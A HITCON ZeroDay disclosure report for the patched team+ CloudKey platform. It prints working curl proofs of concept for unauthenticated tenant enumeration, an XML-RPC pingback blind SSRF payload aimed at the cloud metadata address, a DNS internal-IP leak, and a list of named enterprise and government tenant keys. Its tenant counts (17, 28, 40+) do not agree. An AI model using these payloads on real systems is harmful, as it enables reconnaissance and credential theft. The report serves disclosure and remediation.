互動資通 team+ 私有雲平台 CloudKey 未認證租戶列舉、內部 IP 洩漏與 XML-RPC 盲 SSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00636
  •  發信 Vendor: 互動資通股份有限公司
  • Title: 互動資通 team+ 私有雲平台 CloudKey 未認證租戶列舉、內部 IP 洩漏與 XML-RPC 盲 SSRF
  • Introduction: CloudKey 端點可匿名查詢,17 個有效租戶被列舉,並可串聯 XML-RPC pingback 盲 SSRF 與 DNS 內部 IP 洩漏。

處理狀態

目前狀態

公開
Last Update : 2026/08/13
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2026/05/06 23:17:04 : 新提交 (由 罐頭 更新此狀態)
  • 2026/05/06 23:21:13 : 新提交 (由 罐頭 更新此狀態)
  • 2026/05/06 23:30:52 : 新提交 (由 罐頭 更新此狀態)
  • 2026/05/06 23:32:09 : 新提交 (由 罐頭 更新此狀態)
  • 2026/05/09 17:55:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:54:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:54:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:54:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/02 10:12:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/02 10:12:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/04 20:08:22 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2026/08/12 10:32:53 : 確認已修補 (由 罐頭 更新此狀態)
  • 2026/08/13 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00636
  • 通報者:guan4tou2 (罐頭)
  • 風險:高
  • 類型:資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://cloud.teamplus.com.tw/enterprise/PrivateCloudCenter/PrivateCloudService.ashx
https://www.teamplus.tech/xmlrpc.php
https://ttalkod.teamplus.tech/

敘述

漏洞概述

本案包含 3 個可串聯的問題:

  1. F1 (High):CloudKey 未認證列舉(17 valid / 202 probes)
  2. F2 (Medium):WordPress XML-RPC pingback.ping 盲 SSRF(port-based filter)
  3. F3 (Low):公開 DNS 暴露 RFC1918 內部 IP

已驗證重現步驟(2026-05-06 re-verified live)

F1 — CloudKey 列舉 oracle(2026-05-06 實測)

curl -sk "https://cloud.teamplus.com.tw/enterprise/PrivateCloudCenter/PrivateCloudService.ashx?ASK=getServerSetting&CloudKey=invalidtest99999"

回應:

{"PrivateCloudData":null,"IsSuccess":false,"Description":"get info error"}
curl -sk "https://cloud.teamplus.com.tw/enterprise/PrivateCloudCenter/PrivateCloudService.ashx?ASK=getServerSetting&CloudKey=every8d"

回應(節錄):

{"PrivateCloudData":{"Title":"team+ Community","TwServerUrl":"https://poc.teamplus.com.tw/Every8d/","ServerList":[{"ServerName":"台灣伺服器","Url":"https://poc.teamplus.com.tw/Every8d/"}]},"IsSuccess":true,"Description":"get info success"}

→ 有效 CloudKey 回傳內部服務 URL(poc.teamplus.com.tw/Every8d/)及伺服器清單,無效 CloudKey 回傳 null — oracle 確認。

F2 — pingback timing SSRF(2026-05-06 實測,31 秒 timeout 確認)

time curl -sk https://www.teamplus.tech/xmlrpc.php \
  -H 'Content-Type: text/xml' \
  --data-raw '<?xml version="1.0"?>
<methodCall><methodName>pingback.ping</methodName><params>
<param><value><string>http://169.254.169.254:80/</string></value></param>
<param><value><string>https://www.teamplus.tech/</string></value></param>
</params></methodCall>'

回應(31 秒後):

<methodResponse>
  <fault>
    <value><struct>
      <member><name>faultCode</name><value><int>0</int></value></member>
      <member><name>faultString</name><value><string></string></value></member>
    </struct></value>
  </fault>
</methodResponse>
curl ... 0.01s user 0.01s system 0% cpu 31.243 total

→ faultCode:0 / faultString 空字串 + 31 秒延遲,表示伺服器端確實嘗試連線 169.254.169.254:80(IMDS)並等到 timeout,而非立即拒絕。為盲 SSRF 確認。

F3 — DNS 內部 IP 洩漏

dig +short ttalkod.teamplus.tech
# tweb.talkod.im.
# t.talkod.im.
# 192.168.57.171

影響(區分 verified / potential)

Verified

  • 匿名列舉 28 個 Tier-1 已驗證企業客戶(CloudKey 逐一確認),涵蓋高敏感產業:

    產業 CloudKey 組織
    金融 / 監管 fsc 金管會 FSC
    金融 yuanta 元大人壽
    金融 tcbbank 台中銀行
    政府 cpc 中油
    政府 tra 台鐵
    政府 krtc 高捷
    政府 thb 公路局
    政府 twport 港務
    政府 taisugar 台糖
    醫療 vghks 高雄榮總
    醫療 vghtc 臺中榮總
    醫療 tzuchi 慈濟
    半導體 umc UMC 聯電
    半導體 auo AUO 友達
    半導體 spil 矽品
    半導體 apacer 宇瞻
    半導體 compeq 華通
    半導體 chimei 奇美
    製造 advantech 研華
  • 每個有效 CloudKey 的回應含內部服務 URL(TwServerUrl)及伺服器清單,洩漏內部部署路徑(如 https://poc.teamplus.com.tw/Every8d/)。

  • xmlrpc.php pingback 對 169.254.169.254:80(IMDS)實測 31 秒 timeout(伺服器端確實嘗試連線)。

  • 公開 DNS 洩漏 RFC1918 內部位址 192.168.57.171(ttalkod.teamplus.tech)。

Potential(條件式)

  • 攻擊者可對列出的政府/金融/醫療客戶發動定向釣魚,冒充 team+ 內部通知。
  • 若 teamplus.tech 部署於雲端環境,IMDS SSRF 可升級為雲端 IAM 憑證洩漏。
  • 擴大 CloudKey 字典可能列出更多客戶(目前 40+ 總計,28 Tier-1 已確認)。

修補建議

1. getServerSetting 改為需認證或簽名請求(HMAC + timestamp),移除匿名查詢能力。
2. 失敗與成功回應統一格式,消除列舉 oracle。
3. 立即下線測試租戶/內網 URL(例如 test/jmeter)對外暴露。
4. xmlrpc.php 建議停用 pingback.ping;若需保留,改成 IP allowlist + RFC1918/IMDS blocklist,不可只做 port filter。
5. 清理公開 DNS 中指向 RFC1918 的紀錄,採 split-horizon DNS。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;